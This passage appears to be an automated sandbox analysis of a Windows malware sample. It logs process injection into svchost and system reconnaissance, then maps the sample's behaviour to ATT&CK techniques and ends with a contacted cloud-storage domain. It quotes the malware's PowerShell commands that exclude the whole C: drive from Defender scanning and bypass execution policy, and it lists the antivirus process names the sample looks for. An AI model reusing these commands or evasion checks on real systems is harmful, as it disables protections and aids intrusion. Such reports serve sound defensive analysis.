                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\SysWOW64\svchost.exe6_2_02D077E0
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\System32\svchost.exe6_2_02D077E0
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exe Process created: C:\Users\user\AppData\Roaming\FIWszl1A8l.exe "C:\Users\user\AppData\Roaming\FIWszl1A8l.exe"
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                      Source: FIWszl1A8l.exe, 00000006.00000002.3790306208.00000000032C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: inProgram Manager
                      Source: FIWszl1A8l.exe, 00000006.00000003.1775024265.00000000041B3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: .168.2.9 0 min965969Windows 10 Pro10.0.190454HDD:1WW 223 Gb Free 168 Gb Mem: 8 Gb Free3 Gb Microsoft Basic Render Driver 0 5140 Microsoft Basic Render Driver 0 5140 Program Manager
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exe Code function: _memset,_memset,_memset,gethostname,gethostbyname,inet_ntoa,_strcat_s,_strcat_s,inet_ntoa,_strcat_s,_strcat_s,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,OpenProcess,K32GetProcessImageFileNameW,CloseHandle,GetTickCount,__time64,__localtime64,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW, 6_2_02D05430
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exe; Code function: 0_2_10016BF4 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_10016BF4
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exe; Code function: 6_2_02D15D22 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,6_2_02D15D22
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exe; Code function: 6_2_02D06A70 wsprintfW,GetCurrentProcessId,wsprintfW,_memset,GetVersionExW,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,wsprintfW,6_2_02D06A70
                      Source: FIWszl1A8l.exe; Binary or memory string: acs.exe
                      Source: FIWszl1A8l.exe; Binary or memory string: kxetray.exe
                      Source: FIWszl1A8l.exe; Binary or memory string: avcenter.exe
                      Source: FIWszl1A8l.exe; Binary or memory string: vsserv.exe
                      Source: FIWszl1A8l.exe; Binary or memory string: KSafeTray.exe
                      Source: FIWszl1A8l.exe; Binary or memory string: cfp.exe
                      Source: FIWszl1A8l.exe; Binary or memory string: avp.exe
                      Source: FIWszl1A8l.exe; Binary or memory string: 360Safe.exe
                      Source: FIWszl1A8l.exe; Binary or memory string: 360tray.exe
                      Source: FIWszl1A8l.exe; Binary or memory string: rtvscan.exe
                      Source: FIWszl1A8l.exe; Binary or memory string: TMBMSRV.exe
                      Source: FIWszl1A8l.exe; Binary or memory string: ashDisp.exe
                      Source: FIWszl1A8l.exe; Binary or memory string: 360Tray.exe
                      Source: FIWszl1A8l.exe; Binary or memory string: avgwdsvc.exe
                      Source: FIWszl1A8l.exe; Binary or memory string: AYAgent.aye
                      Source: FIWszl1A8l.exe; Binary or memory string: RavMonD.exe
                      Source: FIWszl1A8l.exe; Binary or memory string: QUHLPSVC.EXE
                      Source: FIWszl1A8l.exe; Binary or memory string: Mcshield.exe
                      Source: FIWszl1A8l.exe; Binary or memory string: K7TSecurity.exe

                      Stealing of Sensitive Information

                      Source: Yara match; File source: Process Memory Space: FIWszl1A8l.exe PID: 7852, type: MEMORYSTR

                      Remote Access Functionality

                      Source: Yara match; File source: Process Memory Space: FIWszl1A8l.exe PID: 7852, type: MEMORYSTR
                      Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances
                      Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains
                      Initial Access: Replication Through Removable Media (1); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools
                      Execution: Native API (1); Command and Scripting Interpreter (2); PowerShell (1); Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript
                      Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
                      Privilege Escalation: DLL Side-Loading (1); Access Token Manipulation (1); Process Injection (222); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
                      Defense Evasion: Disable or Modify Tools (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); Software Packing (1); DLL Side-Loading (1); Masquerading (1); Modify Registry (1); Virtualization/Sandbox Evasion (31); Access Token Manipulation (1); Process Injection (222); Indicator Removal (1)
                      Credential Access: Input Capture (121); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture
                      Discovery: System Time Discovery (2); Peripheral Device Discovery (11); File and Directory Discovery (2); System Information Discovery (26); Security Software Discovery (131); Virtualization/Sandbox Evasion (31); Process Discovery (3); Application Window Discovery (1); Network Sniffing; Network Service Discovery; System Network Connections Discovery
                      Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools
                      Collection: Archive Collected Data (1); Screen Capture (1); Input Capture (121); Clipboard Data (2); Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging
                      Command and Control: Ingress Tool Transfer (2); Encrypted Channel (11); Non-Standard Port (1); Non-Application Layer Protocol (2); Application Layer Protocol (13); Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols
                      Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol
                      Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption
                      Behavior Graph ID: 1587335, Sample: FIWszl1A8l.exe, Startdate: 10/01/2025, Architecture: WINDOWS, Score: 100

                      • Analysis start (node 2)
                        • DNS/IP: jdoigshetligsndglsdrjktg.oss-cn-hongkong.aliyuncs.com
